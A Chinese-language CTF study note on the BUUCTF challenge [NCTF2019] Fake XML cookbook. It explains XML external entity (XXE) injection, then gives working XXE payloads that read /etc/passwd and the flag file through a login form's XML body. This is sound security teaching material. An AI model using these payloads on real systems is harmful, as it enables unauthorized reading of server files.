【学习笔记 46】 buu [NCTF2019]Fake XML cookbook

0x00 知识点

1. XXE攻击

0x01 知识点详解

1. 什么是XXE攻击？
   答： XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞，XXE漏洞发生在应用程序解析XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置，没有对上传的xml文件进行过滤，导致可上传恶意xml文件。
   这里有一篇大佬的博客可以学习学习

0x02 解题思路

1. 打开网站
   
   尝试sql注入无果，在根据题目提示的xml，联想到XXE漏洞，那就用XXE常用的payload进行尝试

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///etc/passwd">
  ]>

发现可以读取成功，那直接读取flag

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///flag">
  ]>
<user><username>&admin;</username><password>admin</password></user>